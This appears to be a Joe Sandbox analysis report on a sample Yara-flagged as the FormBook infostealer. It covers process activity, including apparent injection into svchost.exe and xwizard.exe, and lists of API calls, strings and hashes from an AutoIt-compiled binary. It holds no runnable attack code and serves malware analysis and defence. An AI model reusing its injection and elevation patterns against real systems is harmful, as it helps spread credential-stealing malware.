Dec 13, 2024 13:39:19.556413889 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 13 Dec 2024 12:39:19 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	07:38:19
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\6SN0DJ38zZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6SN0DJ38zZ.exe"
Imagebase:	0x980000
File size:	1'201'665 bytes
MD5 hash:	C0C3A82789A704A5ED3E165D9C61DA76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:38:22
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6SN0DJ38zZ.exe"
Imagebase:	0xda0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1690563091.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1690865350.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1691658146.0000000004150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:12:25
Start date:	13/12/2024
Path:	C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe"
Imagebase:	0x730000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3123079425.00000000032A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:12:27
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\xwizard.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\xwizard.exe"
Imagebase:	0xcc0000
File size:	55'808 bytes
MD5 hash:	8581F29C5F84B72C053DBCC5372C5DB6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2011724830.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2012271134.0000000004B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:12:40
Start date:	13/12/2024
Path:	C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe"
Imagebase:	0x730000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3124514909.0000000005140000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:13:00
Start date:	13/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	6.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	59

Executed Functions

Function 00983B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B68
IsDebuggerPresent.KERNEL32 ref: 00983B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00A452F8,00A452E0,?,?), ref: 00983BEB

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

Part of subcall function 0099092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983C14,00A452F8,?,?,?), ref: 0099096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00983C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A37770,00000010), ref: 009BD281
SetCurrentDirectoryW.KERNEL32(?,00A452F8,?,?,?), ref: 009BD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A34260,00A452F8,?,?,?), ref: 009BD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 009BD346

Part of subcall function 00983A46: GetSysColorBrush.USER32(0000000F), ref: 00983A50
Part of subcall function 00983A46: LoadCursorW.USER32(00000000,00007F00), ref: 00983A5F
Part of subcall function 00983A46: LoadIconW.USER32(00000063), ref: 00983A76
Part of subcall function 00983A46: LoadIconW.USER32(000000A4), ref: 00983A88
Part of subcall function 00983A46: LoadIconW.USER32(000000A2), ref: 00983A9A
Part of subcall function 00983A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AC0
Part of subcall function 00983A46: RegisterClassExW.USER32(?), ref: 00983B16

Part of subcall function 009839D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A03
Part of subcall function 009839D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A24
Part of subcall function 009839D5: ShowWindow.USER32(00000000,?,?), ref: 00983A38
Part of subcall function 009839D5: ShowWindow.USER32(00000000,?,?), ref: 00983A41

Part of subcall function 0098434A: _memset.LIBCMT ref: 00984370
Part of subcall function 0098434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00984415

Strings

runas, xrefs: 009BD33A
This is a third-party compiled AutoIt script., xrefs: 009BD279

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 52a2924d61d21c807166109a3ad1a2fc962b6893a3dca008b4debb6b4f974ca9
Instruction ID: f80f4873316e6aef7d3d30176818bee6a6dc5ccc0c54796f9baec0f611ffd47e
Opcode Fuzzy Hash: 52a2924d61d21c807166109a3ad1a2fc962b6893a3dca008b4debb6b4f974ca9
Instruction Fuzzy Hash: 4251D479D04148AFDF11FBF4DC05AEDBB78AFC5710F108466F861B6262DAA18606CB21

Function 009849A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 009849CD

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

GetCurrentProcess.KERNEL32(?,00A0FAEC,00000000,00000000,?), ref: 00984A9A
IsWow64Process.KERNEL32(00000000), ref: 00984AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00984AE7
FreeLibrary.KERNEL32(00000000), ref: 00984AF2
GetSystemInfo.KERNEL32(00000000), ref: 00984B23
GetSystemInfo.KERNEL32(00000000), ref: 00984B2F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: dab521f94f10f41c685d45a4a4a0a5b8b9982f26442f6e00452f029d7c0fddd9
Instruction ID: 1f8882c2d7c78cd5516172a501ecfd22d355b0926425121ad4861cf8b85c30df
Opcode Fuzzy Hash: dab521f94f10f41c685d45a4a4a0a5b8b9982f26442f6e00452f029d7c0fddd9
Instruction Fuzzy Hash: BF91E33198A7C1DECB35EB7885501EAFFF9AF2A310B444DAED0CA97B41D224E508C759

Function 00984E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00984D8E,?,?,00000000,00000000), ref: 00984E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00984D8E,?,?,00000000,00000000), ref: 00984EB0
LoadResource.KERNEL32(?,00000000,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F), ref: 009BD937
SizeofResource.KERNEL32(?,00000000,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F), ref: 009BD94C
LockResource.KERNEL32(00984D8E,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F,00000000), ref: 009BD95F

Strings

SCRIPT, xrefs: 00984EA6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 9e4ebb08bb5b259a3478a555a2163dac727685dfd3cab7f822441d06b419d8a1
Instruction ID: c3a4467092d5d7d6b33523a2d414e7111e112958c5edcf66f3c73c0d4e1c9bc9
Opcode Fuzzy Hash: 9e4ebb08bb5b259a3478a555a2163dac727685dfd3cab7f822441d06b419d8a1
Instruction Fuzzy Hash: 38119E70240705BFD7209BA5EC48F677BBEFFC9B11F104268F40596650EB71E8028660

Function 0098FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 186680ffd781f0847e919d666aa139101eb79b0b5f1a5f9df72fb808d8b684be
Instruction ID: 76e1181f2f4c2685655f306a3d253434e85267fc1791f03b9cc44aef6ad73287
Opcode Fuzzy Hash: 186680ffd781f0847e919d666aa139101eb79b0b5f1a5f9df72fb808d8b684be
Instruction Fuzzy Hash: 27926B74A083419FDB20DF18C490B2AB7E5BFC9304F14896DE89A9B362D775EC45CB92

Function 009E445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,009BE398), ref: 009E446A
FindFirstFileW.KERNELBASE(?,?), ref: 009E447B
FindClose.KERNEL32(00000000), ref: 009E448B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
Instruction ID: 4712d84c5534b094203feaf42ccea1721f4889b78d2971d0dafd29261a7ab8d9
Opcode Fuzzy Hash: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
Instruction Fuzzy Hash: F5E0D8325105456B8620EB79EC0D4E977DC9E09335F100715F935D14E0F7745D019596

Function 0098E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009C3E62

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: ff58939d5dbd69d189d2e77d080d8fd986f23f5beb5c911436d4560e242f1397
Instruction ID: 974a50c32cf3605e6377904eefd3c2c5681b34ac0894d867b99988fbb71158a2
Opcode Fuzzy Hash: ff58939d5dbd69d189d2e77d080d8fd986f23f5beb5c911436d4560e242f1397
Instruction Fuzzy Hash: FDA2AC74E00209CFCB24EF94C4A0AAEB7B5FF99314F248469E906AB351D775ED42CB91

Function 009909D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990A5B
timeGetTime.WINMM ref: 00990D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990E53
Sleep.KERNEL32(0000000A), ref: 00990E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00990EFA
DestroyWindow.USER32 ref: 00990F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00990F20
Sleep.KERNEL32(0000000A,?,?), ref: 009C4E83
TranslateMessage.USER32(?), ref: 009C5C60
DispatchMessageW.USER32(?), ref: 009C5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009C5C82

Strings

@GUI_CTRLID, xrefs: 009C4F3A
@TRAY_ID, xrefs: 009C578F
@GUI_CTRLHANDLE, xrefs: 009C4FE4
@GUI_WINHANDLE, xrefs: 009C4F8F
@COM_EVENTOBJ, xrefs: 009C54F0

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 1ad92d8bd0f7da55867d2ffcfdca8d3d26726884c4ed42e20681dbd5065b93e6
Instruction ID: c4195b4ac7df4c7478099bb0530c519cfbe908b05786fe052639c5b767771901
Opcode Fuzzy Hash: 1ad92d8bd0f7da55867d2ffcfdca8d3d26726884c4ed42e20681dbd5065b93e6
Instruction Fuzzy Hash: ACB2CF70A08741DFDB24DF24C884FAAB7E8BFC5304F14491DE49A972A1DB75E885CB92

Function 009E9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009E8F5F: __time64.LIBCMT ref: 009E8F69

Part of subcall function 00984EE5: _fseek.LIBCMT ref: 00984EFD

__wsplitpath.LIBCMT ref: 009E9234

Part of subcall function 009A40FB: __wsplitpath_helper.LIBCMT ref: 009A413B

_wcscpy.LIBCMT ref: 009E9247
_wcscat.LIBCMT ref: 009E925A
__wsplitpath.LIBCMT ref: 009E927F
_wcscat.LIBCMT ref: 009E9295
_wcscat.LIBCMT ref: 009E92A8

Part of subcall function 009E8FA5: _memmove.LIBCMT ref: 009E8FDE
Part of subcall function 009E8FA5: _memmove.LIBCMT ref: 009E8FED

_wcscmp.LIBCMT ref: 009E91EF

Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9824
Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E9452
_wcsncpy.LIBCMT ref: 009E94C5
DeleteFileW.KERNEL32(?,?), ref: 009E94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009E9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E9534

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 7b18bbfda55288a8dd86315b563c5c812dc76692669c5c593572565a7ad395ec
Instruction ID: 8aba3b5c7a67a9921c112295e6cef86888e10fb413dbb99504efe44e43297889
Opcode Fuzzy Hash: 7b18bbfda55288a8dd86315b563c5c812dc76692669c5c593572565a7ad395ec
Instruction Fuzzy Hash: 70C14CB1D00219AADF21DF95CC85ADEB7BDEF99310F0040AAF609E7251EB309E458F65

Function 00983015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00983074
RegisterClassExW.USER32(00000030), ref: 0098309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
InitCommonControlsEx.COMCTL32(?), ref: 009830CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
LoadIconW.USER32(000000A9), ref: 009830F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101

Strings

0, xrefs: 00983056
+, xrefs: 0098305D
AutoIt v3 GUI, xrefs: 00983090
TaskbarCreated, xrefs: 009830A4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 2f9d361ec2cdabb20402b8cee3dee16c6bba6784a897eb921a250e7adab184f4
Instruction ID: d5db27bb18910e536cfe2f07ca0de0a0f4b79c4ee8c3bfc521c6801151a986d4
Opcode Fuzzy Hash: 2f9d361ec2cdabb20402b8cee3dee16c6bba6784a897eb921a250e7adab184f4
Instruction Fuzzy Hash: D13125B9841349AFDB20CFE4E889A89BBF0FB09710F14452EE580A62A1DBB50586CF51

Function 00983041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00983074
RegisterClassExW.USER32(00000030), ref: 0098309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
InitCommonControlsEx.COMCTL32(?), ref: 009830CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
LoadIconW.USER32(000000A9), ref: 009830F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101

Strings

0, xrefs: 00983056
+, xrefs: 0098305D
AutoIt v3 GUI, xrefs: 00983090
TaskbarCreated, xrefs: 009830A4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 568c93fd8f0ec7ed09af74e6a3612ad18d2b446cff8f04f77700de0bf8452ece
Instruction ID: 5a4478f761b6040069b23d61e0566d9d8e784a9b6392fe519b1b11288f74d6c9
Opcode Fuzzy Hash: 568c93fd8f0ec7ed09af74e6a3612ad18d2b446cff8f04f77700de0bf8452ece
Instruction Fuzzy Hash: 5821B2B9D0161CAFDB10DFE4E889A9DBBF4FB09700F00412AF910A66A1DBB245469F91

Function 0098708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00984706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A452F8,?,009837AE,?), ref: 00984724

Part of subcall function 009A050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00987165), ref: 009A052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009871A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009BE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009BE909
RegCloseKey.ADVAPI32(?), ref: 009BE947
_wcscat.LIBCMT ref: 009BE9A0

Strings

\, xrefs: 009BE9C3
Software\AutoIt v3\AutoIt, xrefs: 0098719E
Include, xrefs: 009BE8BF, 009BE900
\Include\, xrefs: 00987165

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 6f7f94feb84baf550f6d3cc2adcb26ea99c7d02fa372de7fb212b341da5eb9b5
Instruction ID: 39db3665052ba19d8f5775df0e27b2131c85f7a12041a558611cb099564eb821
